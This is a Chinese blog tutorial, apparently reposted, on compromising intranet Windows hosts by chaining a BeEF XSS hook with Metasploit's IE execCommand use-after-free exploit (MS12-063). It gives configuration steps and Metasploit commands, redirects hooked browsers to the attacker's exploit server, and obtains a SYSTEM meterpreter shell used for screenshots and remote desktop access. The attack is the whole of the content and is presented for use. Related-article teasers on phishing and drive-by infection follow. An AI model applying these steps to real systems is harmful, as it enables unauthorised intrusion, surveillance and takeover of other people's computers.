metasploit利用IE漏洞XSS挂马拿内网主机
http://www.2cto.com/Article/201407/315176.html
metasploit内网渗透方面好多方式,这只是科普下xss在内网中的利用。
用到的工具:beEF+msf
利用的IE漏洞是:http://www.rapid7.com/db/modules/exploit/windows/browser/ie_execcommand_uaf
MS12-063
Automatic IE 7 on Windows XP SP3 IE 8 on Windows XP SP3 IE 7 on Windows Vista IE 8 on Windows Vista IE 8 on Windows 7 IE 9 on Windows 7
用到的beef+msf
先配置下:
root@kali:~# cd /usr/share/beef-xss/
root@kali:/usr/share/beef-xss# ls
beef beef_key.pem config.yaml db Gemfile modules
beef_cert.pem bundle core extensions Gemfile.lock
编辑下config.yaml 把metasploit :false改成true
再进入extensions/metasploit/
同样修改下config.yaml
把host跟callback_host 改成自己的IP 这里是220.128
再改动下custom path:
这样beef已经配置好了。那就运行下metasploit
运行msf后 数据库连接下,不然上线也会没有提示的。这里的pass 就是extensions/metasploit/config.yaml里面的pass
这样就没有什么问题。我们可以先看一下beef.数据库只要连上了就不会出现msf的api错误的。
账号密码beef 配置文件里面有。beef:beef
那beef已经都OK了。 现在来搞下选择下要显示的页面:
hook.js 运行beef 显示出来的。 别忘记运行下apache。
use exploit/windows/browser/ie_execcommand_uaf
可以自己根据自己的要求来选择。
1
|
<span class = "operator" ><span class = "keyword" >show</span> options</span>
|
我用xp+ie7
直接访问下我们的页面192.168.220.128/xss/
beef就会显示出来了。
点击 commands-hookeddomain-REDIRECT BROWSER 让他重新跳转到我们msf生成的地址上。beef很多功能。 把地址改成192.168.220.128:8080(msf生成的地址)
我们就会看到msf上面已经显示出来了。 回显了sessions payload可以自己去改。我使用的meterpreter载荷
执行sessions -i
执行sessions -i ID号 可以执行任意命令已经是系统权限
meterpreter > screenshot
Screenshot saved to: /root/dlsSQBkF.jpeg
就可以看到当前主机的屏幕内容。
也可以rdesktop 远程连接上去。
参数rdesktop -f ip -u username -p password
这也是一种xss挂马拿内网主机。
注:鄙人每天都在写一些metasploit的玩法,如果有大神有什么好的方法希望告诉我,我更新在空间,分享给大家。
如文中未特别声明转载请注明出自:FreebuF.COM
metasploit利用IE漏洞XSS挂马拿内网主机相关推荐
- 利用知名站点欺骗挂马
利用知名站点欺骗挂马 网络上有许多"钓鱼(Pushing)"式攻击,通过各种手段诱骗上网者浏览恶意的网站,导致各种网银或游戏帐号密码丢失.同样的,钓鱼式攻击也被用在欺骗性传播网页木 ...
- 攻防红队日记:利用路由器创建PPTP搭建隧道进内网
弱口令yyds,这是这次攻防演练第二个惊喜,在扫目标的C段IP的时候发现五个网络设备,有三个路由器.一个web管理系统和一台虚拟专用网络设备,看起来版本都比较旧就想着先去找找版本漏洞,试了试都没登陆进 ...
- 第39天:WEB攻防-通用漏洞CSRFSSRF协议玩法内网探针漏洞利用
目录 CSRF:跨站请求伪造 定义: 举例 条件 CSRF的防护 SSRF 服务器端请求伪造 举例 漏洞利用攻击: 端口扫描,指纹识别,漏洞利用, 内网探针(端口字典爆破)--通过远程请求 ...
- 利用公有云cvm 公网IP实现内网穿透,远程登录内网服务器
公有云服务 生成公私钥文件 ssh-keygen && cp ~/.ssh/id_rsa.pub ~/.ssh/authorized_keys 将生成的私钥文件 id_rsa 复制到 ...
- Metasploit利用MS08-067漏洞
环境 攻击机器:ubuntu 18.04 被攻击机器:windows xp sp2 可能使用的工具 metasploit nessus nmap等 正文 首先搭建所需要的靶机环境和安装所有可能使用到的 ...
- Metasploit利用MS17-010漏洞
端口扫描 使用nmap扫描主机及开放的端口:nmap -sS 192.168.1.* Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-25 15: ...
- 如何利用XShell隧道通过跳板机连接内网机器
在服务器众多的企业里,通常运维会把某台机器开放外网访问权限,其他服务器通过该机器进行访问,该机器通常称之为跳板机.开发人员可以通过SSH工具访问服务器,进行日志查看.问题排查等等. 这里先假设一下服务 ...
- 利用NAS免费部署动态解析实现内网穿透
想要从外网访问家中的NAS等设备,一般来说我们需要知道家中路由器的公网IP. 现在固定的公网IP基本上很难免费申请到了,但是一般来说运营商可以免费提供一个动态变化的公网IP:当路由设备重启时,运营 ...
- 如何利用VPS配置搭建frp/frps进行内网穿透
目录 扯一会闲话 什么是frp 准备材料 服务器端安装说明 常用命令包括 扯一会闲话 事情的起因是我用旧电脑拼凑了一台NAS,想在外面也能访问我放在家里的NAS.但大家也知道公网IPv4地址现在已经所 ...
最新文章
- [转]笑话: 耐力惊人的三只乌龟
- u-boot的nand驱动写过程分析
- React相关资源推荐
- 无状态Spring安全性第1部分:无状态CSRF保护
- MSP430F5529 DriverLib 库函数学习笔记(五)定时器A
- 使用Symantec Altiris 来监控 Dell 服务器 的 硬件
- UIView的一些基本方法 init、loadView、viewDidLoad、viewDidUnload、dealloc
- C/C++ 结构体成员在内存中的对齐规则(转载)
- 苹果首款自研芯片Mac成本可能上升 因设计改变
- C语言编程新手自学手册下载,C语言编程新手自学手册
- CentOS7安装MySQL及常用指令
- 【小算法】求约数个数
- 云计算的认识和看法_浅谈对云计算的认识
- 玩客云刷机(2022-3-19亲测)
- devC++代码格式化对齐的快捷键
- 深入分析ClassLoader
- org.apache.http.conn.HttpHostConnectException: Connect to sonatype-download.global.ssl.fastly.net:44
- 抖音营销的6种方法5个套路
- 成功解决java报错:Implicit super constructor XX() is undefined. Must explicitly invoke another constructor.
- 你可能错过的关于 Windows 应用程序软件开发的 3 个趋势